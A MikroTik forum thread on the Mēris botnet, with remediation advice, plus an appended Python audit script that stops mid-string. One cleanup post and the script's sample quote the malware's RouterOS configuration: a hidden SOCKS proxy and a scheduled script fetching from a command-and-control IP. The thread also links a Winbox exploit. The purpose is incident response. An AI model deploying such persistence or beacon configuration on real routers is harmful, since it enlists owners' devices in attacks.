normis
MikroTik Support
Topic Author
Posts: 25031
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Mēris botnet information

Fri Sep 10, 2021 1:43 pm

Many of you have asked what this Mēris botnet that some news outlets are discussing right now is, and whether there is any new vulnerability in RouterOS.

As far as we have seen, these attacks use the same routers that were compromised in 2018, when MikroTik RouterOS had a vulnerability that was quickly patched.

Unfortunately, closing the vulnerability does not immediately protect these routers. If somebody got your password in 2018, just an upgrade will not help. You must also change the password, re-check that your firewall does not allow remote access to unknown parties, and look for scripts that you did not create.

We have tried to reach all users of RouterOS about this, but many of them have never been in contact with MikroTik and are not actively monitoring their devices. We are working on other solutions too.

As far as we know right now, there are no new vulnerabilities in these devices. RouterOS has recently been independently audited by several contractors.

If you do see a RouterOS device that has malicious scripts or SOCKS configuration that was not created by you, especially if this configuration APPEARED NOW, RECENTLY, WHILE RUNNING A NEW ROUTEROS RELEASE: Please contact us immediately.
No answer to your question? How to write posts
 
normis
MikroTik Support
Topic Author
Posts: 25031
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mēris botnet information

Fri Sep 10, 2021 1:48 pm

More specifically, we suggest disabling SOCKS and looking in the System -> Scheduler menu. Disable all rules you can't identify. By default, there should be no Scheduler rules, and SOCKS should be off.
 
mafiosa
Member Candidate
Posts: 187
Joined: Fri Dec 09, 2016 8:10 pm
Location: Kolkata, India

Re: Mēris botnet information

Fri Sep 10, 2021 3:41 pm

Is SOCKS present in v7.1 RC3?
 
R1CH
Forum Veteran
Posts: 984
Joined: Sun Oct 01, 2006 11:44 pm

Re: Mēris botnet information

Fri Sep 10, 2021 3:52 pm

Since these infected users still appear to be upgrading to recent RouterOS versions, can the upgrade process look for non-Mikrotik binaries or other signs of infection and warn the administrator to netinstall? If there was a system exploit to run arbitrary code, simply removing socks and scripts and adding a firewall is not enough, as RouterOS does not allow admins to see all processes running on the router. A netinstall is the only way to be sure.

I highly doubt an open socks proxy or similar is responsible for DDOS as that means the attacker still has to generate the traffic elsewhere.
 
normis
MikroTik Support
Topic Author
Posts: 25031
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mēris botnet information

Fri Sep 10, 2021 3:59 pm

There are no non-mikrotik binaries involved, only legitimate SOCKS, L2TP and Scheduler configuration.
 
mada3k
Member
Posts: 446
Joined: Mon Jul 13, 2015 10:53 am
Location: Sweden

Re: Mēris botnet information

Fri Sep 10, 2021 6:58 pm

What was the entry point for the vulnerability: non-firewalled Winbox, SOCKS or HTTP?
 
rextended
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Fri Sep 10, 2021 7:01 pm

The most common entry point is the same username and password on all devices after 4 years...
 
R1CH
Forum Veteran
Posts: 984
Joined: Sun Oct 01, 2006 11:44 pm

Re: Mēris botnet information

Fri Sep 10, 2021 9:32 pm

There are no non-mikrotik binaries involved, only legitimate SOCKS, L2TP and Scheduler configuration.
What native functions in RouterOS support sending pipelined HTTP requests at these kind of rates? I find it unlikely that the attackers are simply proxying their DDoS traffic through infected Mikrotik devices - why not attack the target directly if they have that much bandwidth available? Especially as they do not know the upstream bandwidth or CPU power of the infected device, not all the proxied traffic is likely to make it out so it would actually reduce the power of their attack. This doesn't make sense.
 
pe1chl
Forum Guru
Posts: 7733
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mēris botnet information

Fri Sep 10, 2021 10:31 pm

Starting today I see a new flood of random GRE traffic on the internet, not sure if it is caused by this botnet or if it is just coincidence.
It appears to consist of GRE packets with random addresses both outside and inside, and with a UDP payload with random port numbers and 512 bytes of random data.
Likely they hope that some places will just unpack such GRE traffic when sent to them, and then forward the tunneled traffic. But I don't think MikroTik routers would do that, they would only accept GRE traffic from sources that are configured as peers in a GRE tunnel, right?
But I have seen such storms before, probably during earlier botnet outbreaks.
 
rextended
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Fri Sep 10, 2021 11:29 pm

On GRE you can omit only the local source, but you must specify the remote address...
The source can be spoofed, but I hope no one establishes a GRE link on the Internet without at least IPsec...
 
jwshields
just joined
Posts: 2
Joined: Wed Aug 05, 2020 2:34 am
Location: Seattle, WA, USA

Re: Mēris botnet information

Sat Sep 11, 2021 12:49 pm

For the last few days/week or two, I've been receiving a higher than normal amount of TCP port scans and small attacks against my home network. They all seem to be coming from the same IPs, or at least the same /24; usually they seem to be either scanning huge groups of around 10k or more ports each time, or they're continually hitting the same port over and over.
Might not be related to this botnet, but I thought I'd share some oddities I've been seeing.
 
mada3k
Member
Posts: 446
Joined: Mon Jul 13, 2015 10:53 am
Location: Sweden

Re: Mēris botnet information

Sat Sep 11, 2021 1:18 pm

Starting today I see a new flood of random GRE traffic on the internet, not sure if it is caused by this botnet or if it is just coincidence.
It appears to consist of GRE packets with random addresses both outside and inside, and with a UDP payload with random port numbers and 512 bytes of random data.
I have also seen them.

These types of lower-level attacks and exploits are quite scary. Some equipment by default picks up ICMP, GRE, ESP/AH packets and other non-TCP/UDP packets and processes them in the kernel. Sometimes IPsec IKE is allowed by default as well.
 
Jotne
Forum Guru
Posts: 2308
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: Mēris botnet information

Sat Sep 11, 2021 2:02 pm

This shows the number of hits on my router on port 8291 (Winbox) over the last 4 months. It only counts one IP per user per day, since everyone who tries to access a non-open port is blocked for 24 hours. There has been no increase in traffic.
(attachment: 8291.jpg)
 
mozerd
Long time Member
Posts: 548
Joined: Thu Oct 05, 2017 3:39 pm
Location: Canada

Re: Mēris botnet information

Sat Sep 11, 2021 2:44 pm

Based on my experience installing MOAB for many users .. 100% had very poor firewall security measures due to ignorance and/or lack of diligence ... once a router has been compromised the ONLY recourse is to netinstall and manually configure ... MikroTik should make the Netinstall procedure much more transparent [much easier to use] since many get confused by the procedures needed. The DEFAULT firewall currently provided by MikroTik is an excellent starting point ... unfortunately many ignore it.
 
Jotne
Forum Guru
Posts: 2308
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: Mēris botnet information

Sat Sep 11, 2021 2:58 pm

One of many problems is that many routers are at remote locations and netinstall only works locally. Some are high up in towers or on rooftops, etc.
 
rextended
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Sat Sep 11, 2021 2:59 pm

Netinstall also works remotely...
If you have at least one device under control, you can netinstall the others remotely...
Obviously exceptions apply.
 
anav
Forum Guru
Posts: 8393
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mēris botnet information

Sat Sep 11, 2021 3:15 pm

Based on my experience installing MOAB for many users .. 100% had very poor firewall security measures due to ignorance and or lack of diligence ... once a router has been compromised the ONLY recourse is to netinstall and manually configure ... MikroTik should make the Netinstall procedure much more transparent [much easier to use] since many get confused by the procedures needed. The DEFAULT firewall currently provided by MikroTik is an excellent starting point ... unfortunately many ignore it.
Yes, it would be helpful for MikroTik to make a video that explains their default firewall and to let new users know that they should ignore 98% of the crap on YouTube and go to the forum to get advice when changing the default firewall rules. I concur that the netinstall process is a tad convoluted and any way to make it more intuitive or easier would be appreciated.
 
edyatl
Posts: 0
Joined: Sat Sep 11, 2021 8:14 pm

Re: Mēris botnet information

Sat Sep 11, 2021 8:36 pm

And how to check a router for Meris malware? Are there any tips on how to check and fix it? Is there an official cure release?
 
msatter
Forum Guru
Posts: 2274
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mēris botnet information

Sat Sep 11, 2021 8:39 pm

Second posting here.
 
mrz
MikroTik Support
Posts: 6335
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia

Re: Mēris botnet information

Sat Sep 11, 2021 10:12 pm

And how to check a router for Meris malware? Are there any tips on how to check and fix it? Is there an official cure release?
As stated in the first post:

If you do see a RouterOS device that has malicious scripts or SOCKS configuration that was not created by you
 
madars
Posts: 0
Joined: Sat Sep 11, 2021 10:27 pm
Location: Cambridge, MA

Re: Mēris botnet information

Sat Sep 11, 2021 10:45 pm

I recently helped my friend Ritvars clean up his MikroTik router (a hAP AC running the latest 6.48.4 stable). We would like to note that this router’s factory firmware was v6.44.6 and as such the router had never run a vulnerable RouterOS version.

So how did it become part of Mēris? Simple: my friend previously had an older MikroTik that had WinBox open to the entire world and that older router got compromised at some point in the past. When he replaced this old router he also copied over the old config including changes that Mēris had made. Ooops! Something to check for in your own deployments.

About the indicators of compromise -- they were the same as mentioned above but let us add a bit more detail.

First: the SOCKS proxy was enabled, running on a non-standard port. SOCKS uses TCP port 1080 by default and comes disabled. You would definitely know if you had it enabled as it is a very atypical config. Moreover, the SOCKS access list had a single entry with an IP range we did not recognize:
/ip socks
set enabled=yes port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
At this point the router’s CPU was pegged at 50% and we saw ~200 open SOCKS connections pushing whatever malicious traffic. As we disabled SOCKS proxy the CPU usage promptly dropped to 2%.

Second: the router had a scheduled task executing an unknown script. Again, in its default config RouterOS has no scripts and no scheduled tasks defined. Ours looked as follows:
/system scheduler
add interval=30s name=schedule4_ on-event=script4_ policy=\
    ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
/system script
add dont-require-permissions=no name=script4_ owner=Ritvars policy=\
    ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
    ddress=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-resu\
    lt=no"
Notice that the IP belongs to the same C&C range mentioned above. So we deleted the script and deleted the scheduled task. We did not observe any L2TP changes: the L2TP config was blank, as is the default.

Please note that the same WinBox exploit which presumably was used to gain the initial compromise would also have allowed the attacker to recover all user passwords in plain text (including passwords for deleted users). See details at https://github.com/BigNerd95/WinboxExploit . Therefore you should rotate your passwords in RouterOS and everywhere else you have reused the same. I'd suggest you also make sure to restrict your router management access (e.g. ssh, WinBox) to a minimal subset of networks (ideally: networks you physically control like your LAN). Don’t have them wide open to the entire internet.

Speaking of the latter point: keeping up-to-date IP lists is harder than it needs to be. For example, a MikroTik script limits file access to 4 kilobytes, and while there is a workaround to load IP lists up to 63K, it leaves little room for growth if your IP lists have comments. Is there a better way coming in new RouterOS? :) Moreover, unless I want to manually upgrade the RouterOS CA certificates, I have to run /tool fetch with check-certificate=no as the latest stable RouterOS does not recognize LetsEncrypt. Could you make sure that the RouterOS database is in sync with, say, Mozilla's ca-certificates? Here is how Debian maintains their copy: https://salsa.debian.org/debian/ca-certificates.

Finally, thank you for all your hard work. We are very happy users of MikroTik and are very much looking forward to the new 7.x branch hitting stable. WireGuard, ZeroTier, rock solid hardware - what's not to love.
 
msatter
Forum Guru
Posts: 2274
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mēris botnet information

Sat Sep 11, 2021 11:09 pm


Speaking of the latter point: keeping up-to-date IP lists is harder than it needs to be. For example, a MikroTik script limits file access to 4 kilobytes, and while there is a workaround to load IP lists up to 63K, it leaves little room for growth if your IP lists have comments. Is there a better way coming in new RouterOS? :)
That 63K has also been resolved; see the last posting in the mentioned thread. The import can be as large as you like, until the router runs out of storage space.
 
madars
Posts: 0
Joined: Sat Sep 11, 2021 10:27 pm
Location: Cambridge, MA

Re: Mēris botnet information

Sat Sep 11, 2021 11:20 pm

Hahahahaha, I love the HTTP Range header hack! But I think you will agree that it is brittle: it is not guaranteed that the server won't change the file in between your 64K chunk requests and make the internal state of your script inconsistent.
 
rextended
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Sat Sep 11, 2021 11:31 pm

I invented that method, and it is not a hack, it is just how the HTTP protocol works...

How to download only one piece of file at a time with /tool fetch and put it inside a variable
viewtopic.php?f=9&t=177530

"fetch" is already planned to be managed in the future for file not found, file changed, redirect, etc. This is an example:
manage fetch errors
viewtopic.php?f=2&t=178355&p=878643#p878643
 
madars
Posts: 0
Joined: Sat Sep 11, 2021 10:27 pm
Location: Cambridge, MA

Re: Mēris botnet information

Sat Sep 11, 2021 11:53 pm

And there is no way to make "the script inconsistent", at least less or more data is imported.
That's arguing semantics. Of course importing less data is not the same as atomically importing the entire list. Note that "When resuming to request more parts of a resource, you need to guarantee that the stored resource has not been modified since the last fragment has been received." In practice this means supplying an ETag or a Last-Modified validator, or accepting data losses. Such data losses probably do not matter much for importing excessively long IP lists, but it is something I'd want to be fixed in the scripting language itself.
Last edited by madars on Sat Sep 11, 2021 11:57 pm, edited 1 time in total.
 
rextended
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Sat Sep 11, 2021 11:56 pm

I know when the blacklists I use are updated; I simply do not update at the same time, nothing particularly difficult...

That's arguing semantics.
You're starting to write like a troll.
Have you just registered to disturb?
Nobody forces you to use published scripts.
 
msatter
Forum Guru
Posts: 2274
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mēris botnet information

Sun Sep 12, 2021 12:03 am

Hahahahaha, I love the HTTP Range header hack! But I think you will agree that it is brittle: it is not guaranteed that the server won't change the file in between your 64K chunk requests and make the internal state of your script inconsistent.
There is indeed a delay between the read chunks. The script already cuts away the first line and a part of the last lines so that there are clean lines to be imported.
I don't think it is feasible to first fill a loop of subsequent arrays to minimize the time taken between the chunks read while filling the address-list. Another method could be checking on each loop if the size of the file has changed in the meantime; I can't see the time of the file to download, so that is not an option. If so, then the import could restart.

Then, how far do you want to go to exclude every point of failure? The import is also logged by default. Checking the log is always a good routine.

Edit: the script has been adapted to detect changes in file size during import. It will retry a set number of times and then give a warning on failure that the user has to check if the list is still being maintained.
 
R1CH
Forum Veteran
Posts: 984
Joined: Sun Oct 01, 2006 11:44 pm

Re: Mēris botnet information

Sun Sep 12, 2021 3:59 pm

I wonder if there is some traffic amplification bug in the socks proxy, this doesn't make any sense to use as a DDOS botnet if you still have to originate all the attack traffic. I suppose it makes an attack harder to block when it originates from thousands of infected IPs, but based on volume this has to significantly reduce the attack power vs raw volumetric outbound traffic.
 
mozerd
Long time Member
Posts: 548
Joined: Thu Oct 05, 2017 3:39 pm
Location: Canada

Re: Mēris botnet information

Sun Sep 12, 2021 4:29 pm

Edit: the script has been adapted to detect changes in file-size during import. It will retry a set number of times and then give an warning on failure that the user has check if the list is still being maintained.
@msatter

The only list that I am aware of that may undergo changes is firehol_level1, where the check frequency is 1 minute ... Personally I would not be concerned with changes that take place by the minute or by the hour .....

Cybercrime IP Feeds by FireHOL exploits HUNDREDS of lists ... IMO its the most comprehensive system built which is why I use them for MOAB.

The code you have been working on would benefit the MikroTik community greatly [and put MOAB out of business] if you adapted the code to exploit the lists that FireHOL produces -- the only caveat being that there is a significant number of duplicate IPs when merging the lists, plus the numeric sequence is important to improve performance -- if the numeric sequence is random the insertion takes longer.
 
rextended
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Sun Sep 12, 2021 6:23 pm

@mozerd, I invented "How to download only one piece of file at a time with /tool fetch and put it inside a variable"
viewtopic.php?f=9&t=177530
If I didn't, @msatter would have nothing to work with...
I made the code available to everyone, but it's not really polite to credit @msatter,
but @msatter is to be thanked for taking the development forward.
 
mozerd
Long time Member
Posts: 548
Joined: Thu Oct 05, 2017 3:39 pm
Location: Canada

Re: Mēris botnet information

Sun Sep 12, 2021 7:01 pm

@rextended
Your contribution is very much appreciated, IMO, by everyone. @msatter code exploitation is outstanding and I certainly would like to encourage the development because the MikroTik community would derive excellent benefits.
 
rextended
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Sun Sep 12, 2021 9:25 pm

Nothing to add, it is true, thanks.
 
msatter
Forum Guru
Posts: 2274
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mēris botnet information

Sun Sep 12, 2021 11:51 pm

Cybercrime IP Feeds by FireHOL exploits HUNDREDS of lists ... IMO its the most comprehensive system built which is why I use them for MOAB.

The code you have been working on would benefit the MikroTik community greatly [and put MOAB out of business] if you adapted the code to exploits the lists that FireHOL produces -- the only caveat being that there is a significant number of duplicate IP's when merging the lists plus the numeric sequence is important to improve performance -- if the numeric sequence is random the insertion takes longer.
Reading the list was no problem, and using the delimiter allows both IP addresses and IP addresses with a range to be imported. I did not find it slow on importing, and RouterOS will sort the lists. I assume that is done at the moment it is being displayed, and in stages.

Merging different lists is a different thing and is best database driven. I am not into that. ;-)

I tested with the FireHOL Level2 list: viewtopic.php?f=9&t=152632&p=879181#p825755 and you now also have to supply the list name without spaces.

The import script is updated, so that on failure the old list is restored. On successful import the temporary backup is removed.
 
pe1chl
Forum Guru
Posts: 7733
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mēris botnet information

Mon Sep 13, 2021 12:30 am

Can we stop the off-topic discussion about address lists or move it to some other topic?
 
brg3466
Member Candidate
Posts: 122
Joined: Sat Aug 01, 2015 7:29 am

Re: Mēris botnet information

Mon Sep 13, 2021 2:54 am

This shows number of hits on my router on port 8291 Winbox, last 4 month. It only counts one IP for each user a day, since all who tries to access a non open port are blocked for 24 hours. There has been no increase of traffic.
Hello Jotne,
would you mind sharing your script on how to "block the outside IP for 24hrs if they try to access your non-open port"? I think it is a good way to prevent those attacks.

Thanks !
 
raimondsp
MikroTik Support
Posts: 102
Joined: Mon Apr 27, 2020 10:14 am

Re: Mēris botnet information

Mon Sep 13, 2021 9:28 am

Must be mentioned:

Do not use the same passwords from 2018 ever again!

Even on different routers. The hackers who obtained system user database files via CVE-2018-14847 may apply brute force to try every stolen password on every MikroTik (and maybe even non-MikroTik) device. For example, you had the "#My sUp3R(!) Secr37 P@ssword" password back in 2018. Then you heard about CVE-2018-14847, upgraded RouterOS, changed the password, and verified that there were no malicious scripts. In 2021, you've bought a new router and are considering using the old and forgotten "#My sUp3R(!) Secr37 P@ssword" again... NO! Don't do this!

Also, changing passwords from something like "jF9ikfW21u-01" to "jF9ikfW21u-02" is not a good idea either due to an iterable pattern.
 
rextended
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Mon Sep 13, 2021 10:15 am

(I'm curious to know from now how many people will use the password "#My sUp3R(!) Secr37 P@ssword" :) )
 
djdrastic
Member
Posts: 336
Joined: Wed Aug 01, 2012 2:14 pm

Re: Mēris botnet information

Mon Sep 13, 2021 11:07 am

I had a friend replace his ISP CPE router with a CCR running 6.47.10 over the weekend and he got compromised within probably 5 minutes of initial configuration. Had a SOCKS server running with some weird scheduled tasks after compromise. We netinstalled but really will wait it out until there's better info on what's going on before trying to replace the ISP router.

I suspect he didn't set his firewall rules correctly on the WAN side so he had services exposed to the public internet. The password he said he generated uniquely out of 1Password, so it shouldn't have been a dictionary attack.
 
mkx
Forum Guru
Posts: 6558
Joined: Thu Mar 03, 2016 10:23 pm

Re: Mēris botnet information

Mon Sep 13, 2021 11:09 am

CCR comes without any default configuration and that includes firewall. So it is essential to do all the configuration before ever exposing it to WAN. And that includes solid firewall rules which is not an easy task for novice ROS user.
 
pe1chl
Forum Guru
Posts: 7733
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mēris botnet information

Mon Sep 13, 2021 11:28 am

CCR comes without any default configuration and that includes firewall.
It even comes without a password! Like almost all MikroTik devices, the admin password is empty on first run. So when it was connected before the password was set, it was quite easy to hack it!
On a "home" device there is protection from the firewall, but still this is something that is frowned upon in 2021.
Most other router manufacturers now deliver their devices with a default password shown on a sticker these days, but MikroTik does this only on a few devices (like "wireless wire") that are sold as preconfigured plug-and-play solutions.
 
djdrastic
Member
Posts: 336
Joined: Wed Aug 01, 2012 2:14 pm

Re: Mēris botnet information

Mon Sep 13, 2021 12:43 pm

Aye, agree with you guys. I wasn't present so cannot comment on how he configured it initially.
From what I gather he did set the password initially before configuring the WAN as he is required to set a static /30 with his provider to make his circuit work.
 
mada3k
Member
Posts: 446
Joined: Mon Jul 13, 2015 10:53 am
Location: Sweden

Re: Mēris botnet information

Mon Sep 13, 2021 1:06 pm

But this was related to Winbox? (that I've never used and always had the service disabled)

What "novice user" buys a CCR? A Cisco also comes with a blank password by default.
 
Jotne
Forum Guru
Posts: 2308
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: Mēris botnet information

Mon Sep 13, 2021 1:11 pm

Hello Jotne,
would you mind sharing your script on how to "block the outside IP for 24hrs if they try to access your non-open port"? I think it is a good way to prevent those attacks.
Here you go:
viewtopic.php?f=23&t=178496
 
brg3466
Member Candidate
Posts: 122
Joined: Sat Aug 01, 2015 7:29 am

Re: Mēris botnet information

Mon Sep 13, 2021 7:16 pm

Thanks again !
 
edyatl
Posts: 0
Joined: Sat Sep 11, 2021 8:14 pm

Re: Mēris botnet information

Tue Sep 14, 2021 12:48 pm

Qrator.Radar team made an individual checker https://radar.qrator.net/, allowing to see if a particular IP address was involved in the Meris attacks.
 
maigonis
Frequent Visitor
Posts: 76
Joined: Sat Jul 20, 2019 8:16 pm

Re: Mēris botnet information

Tue Sep 14, 2021 10:31 pm

To defend my home router I follow the technique "Block all, allow a few". I have configured my firewall to allow a few ports that I need and block all other input, including from LAN; only my main PC network and VPN are allowed to access it. Winbox access, ssh, ftp etc. are allowed only from those networks too, so to access my router remotely I need to connect to the VPN. That is the safest option in my opinion.

I have blocked ping also, so no target scanner can ping my network. Of course hackers can attack my host blindly, but that mitigates some portion of attacks. Also always generate strong passwords and use them once (as mentioned already). I use a password manager to generate and store my passwords, so I don't have to remember them.
 
normis
MikroTik Support
Topic Author
Posts: 25031
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mēris botnet information

Wed Sep 15, 2021 9:02 am

 
mducharme
Trainer
Posts: 1432
Joined: Tue Jul 19, 2016 6:45 pm

Re: Mēris botnet information

Wed Sep 15, 2021 9:26 am

Is there a possible vulnerability for MNDP on UDP 5678? I've seen this mentioned before, that the Meris botnet devices all seem to have UDP 5678 open, but is this indicative of a vulnerability in MNDP, or instead just a means for the botnet to relocate nodes that have possibly changed IPs and that it has lost track of for whatever reason?
 
normis
MikroTik Support
Topic Author
Posts: 25031
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mēris botnet information

Wed Sep 15, 2021 9:30 am

It's just a way to find MikroTik devices, as far as we know. The main intrusion vector right now is admin/no password + Windows malware.
 
pe1chl
Forum Guru
Posts: 7733
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mēris botnet information

Wed Sep 15, 2021 11:19 am

Does the Windows malware also attempt to find "saved passwords" in e.g. winbox addresses.cdb and browser password save features?
 
rextended
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Wed Sep 15, 2021 11:25 am

If I wrote a malware, it would be the first thing I would do to take away the passwords stored in "Windows Vault" / WinBox / Dude / Firefox, Google, Edge passwords saved on the browser, e-mail passwords saved on thunderbird, outlook, etc.
 
msatter
Forum Guru
Posts: 2274
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mēris botnet information

Wed Sep 15, 2021 12:42 pm

I have a firewall on Windows that only allows Winbox to use those ports. If they managed to install an infected version of Winbox, the firewall will first ask if I want to allow traffic, because Winbox itself has changed.

I don't have this kind of protection on Android or iOS.
 
loloski
Frequent Visitor
Posts: 96
Joined: Mon Mar 15, 2021 9:10 pm

Re: Mēris botnet information

Fri Sep 17, 2021 6:42 am

To further reduce the likelihood of this, I hope MikroTik will also consider binding Winbox to a specific interface, to the liking of the sysadmin, so that Winbox will not be exposed on the WAN-side interface and no firewall rules are needed for some novice users. Just my 0.2.
 
mkx
Forum Guru
Posts: 6558
Joined: Thu Mar 03, 2016 10:23 pm

Re: Mēris botnet information

Fri Sep 17, 2021 9:00 am

Default configuration (on devices that come with default) on recent ROS versions includes this:
# Establish proper interface list membership
/interface list member
add list=LAN interface=bridge comment="defconf"
add list=WAN interface=ether1 comment="defconf"

# block access to router's IP and IPv6 services originated not through one of LAN interfaces
# This includes also management access: telnet, ssh and winbox
/ip firewall filter
add chain=input action=drop in-interface-list=!LAN comment="defconf: drop all not coming from LAN"
/ipv6 firewall filter
add chain=input action=drop in-interface-list=!LAN comment="defconf: drop everything else not coming from LAN"

# allow discovery (MNDP) only on LAN interfaces
/ip neighbor discovery-settings
set discover-interface-list=LAN

# allow MAC services (telnet and winbox) only through LAN interfaces
/tool mac-server
set allowed-interface-list=LAN
/tool mac-server mac-winbox
set allowed-interface-list=LAN

If one doesn't mindlessly change these settings and properly maintains interface list membership, router remains properly secured.

There are two notable exceptions:
  1. routers which come without any default config. These are "pro" line of devices (CCR, CRS and select RB models) and those require a knowledgeable administrator to properly configure device.
  2. routers which were initially configured with older ROS version or had IPv6 package installed and enabled after initial configuration reset. ROS upgrade and/or package install doesn't change configuration (other than upgrading some syntax if that's required).
    Nothing much to be done automatically in this case, automagical enforcement of default firewall rules would likely break existing firewall rules and upgrade procedure has no way of detecting the reason for firewall rules to be set in any particular way.


And no, I would not like to see some implicit filtering that cannot be changed by the (dumb?) administrator. ROS is so much liked by (pro?) users exactly because absolutely the whole configuration is transparent to the administrator and there's nothing the administrator cannot change. But yes, freedom does come with a cost (which is an extremely steep learning curve) and if a novice user can't bear that cost, (s)he should go to another vendor (not something MT would like to advertise; this would hurt their sales quite some, I guess).

Perhaps MT's resellers should require buyers to possess some MTCxx certificate? ;-)
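An audit helper, added here as an example and not part of this thread, RouterOS or any poster's code: it parses a `/export` dump and flags the indicators madars described (SOCKS enabled on an odd port, an unrecognised SOCKS access entry, a scheduler entry driving a script that fetches from an outside host) and reports which of the default-configuration lines quoted in mkx's post are missing. The function names, the `Finding` tuple and the two sample exports (built from the configuration quoted in those two posts) are assumptions of this example.

```python
"""Audit a RouterOS /export for the Mēris indicators and the default-config hardening
settings discussed in this thread. Hypothetical helper, not MikroTik code."""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "severity message")  # severity: "high", "medium" or "low"

# key=value pairs in an export line; a quoted value (e.g. a script source) is taken whole
ATTR_RE = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S+)')

# Default-configuration settings quoted in mkx's post; each must be present verbatim.
EXPECTED_DEFCONF = {
    "/ip firewall filter": {"chain": "input", "action": "drop", "in-interface-list": "!LAN"},
    "/ipv6 firewall filter": {"chain": "input", "action": "drop", "in-interface-list": "!LAN"},
    "/ip neighbor discovery-settings": {"discover-interface-list": "LAN"},
    "/tool mac-server": {"allowed-interface-list": "LAN"},
    "/tool mac-server mac-winbox": {"allowed-interface-list": "LAN"},
}

def join_continuations(export_text):
    """Rejoin lines that /export wrapped with a trailing backslash; drop blanks and # comments."""
    logical, buf = [], ""
    for raw in export_text.splitlines():
        line = buf + raw.strip()   # RouterOS discards the indent of a continuation line
        buf = ""
        if line.endswith("\\"):
            buf = line[:-1]
            continue
        if line and not line.startswith("#"):
            logical.append(line)
    if buf:
        logical.append(buf)
    return logical

def parse_export(export_text):
    """Return (menu path, attributes) per command, e.g. ('/ip socks', {'enabled': 'yes', 'port': '4153'})."""
    menu, entries = "", []
    for line in join_continuations(export_text):
        if line.startswith("/"):
            menu = line
        else:
            entries.append((menu, {k: v.strip('"') for k, v in ATTR_RE.findall(line)}))
    return entries

def audit(export_text):
    """Flag the indicators from madars's post, then check that the defconf hardening is present."""
    entries = parse_export(export_text)
    findings = []
    for menu, a in entries:
        if menu == "/ip socks" and a.get("enabled") == "yes":
            findings.append(Finding("high", f"SOCKS enabled on port {a.get('port', '1080')}; it is off by default"))
        elif menu == "/ip socks access":
            findings.append(Finding("high", f"SOCKS access entry: {a.get('action')} src-address={a.get('src-address')}"))
        elif menu == "/system scheduler":
            findings.append(Finding("medium", f"scheduler '{a.get('name')}' runs '{a.get('on-event')}' "
                                              f"every {a.get('interval')}; none exist by default"))
        elif menu == "/system script":
            # a script whose source fetches from an outside host is the beacon pattern quoted above
            m = re.search(r"/tool fetch\b.*?\baddress=([\w.:-]+)", a.get("source", ""))
            if m:
                findings.append(Finding("high", f"script '{a.get('name')}' fetches from {m.group(1)}"))
            else:
                findings.append(Finding("low", f"script '{a.get('name')}' present; review its source"))
    for menu, wanted in EXPECTED_DEFCONF.items():
        if not any(m == menu and all(a.get(k) == v for k, v in wanted.items()) for m, a in entries):
            findings.append(Finding("medium", f"{menu}: default setting {wanted} not found"))
    return findings

# Constructed sample: the indicators quoted in madars's post, wrapped as /export wraps them,
# on a router that never received the default firewall (e.g. a CCR configured from scratch).
COMPROMISED_EXPORT = r"""
/ip socks
set enabled=yes port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
/system scheduler
add interval=30s name=schedule4_ on-event=script4_ policy=\
    ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
/system script
add dont-require-permissions=no name=script4_ owner=Ritvars policy=\
    ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
    ddress=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-resu\
    lt=no"
"""

# Constructed sample: only the default-config lines quoted in mkx's post.
DEFCONF_EXPORT = """
/ip firewall filter
add chain=input action=drop in-interface-list=!LAN comment="defconf: drop all not coming from LAN"
/ipv6 firewall filter
add chain=input action=drop in-interface-list=!LAN comment="defconf: drop everything else not coming from LAN"
/ip neighbor discovery-settings
set discover-interface-list=LAN
/tool mac-server
set allowed-interface-list=LAN
/tool mac-server mac-winbox
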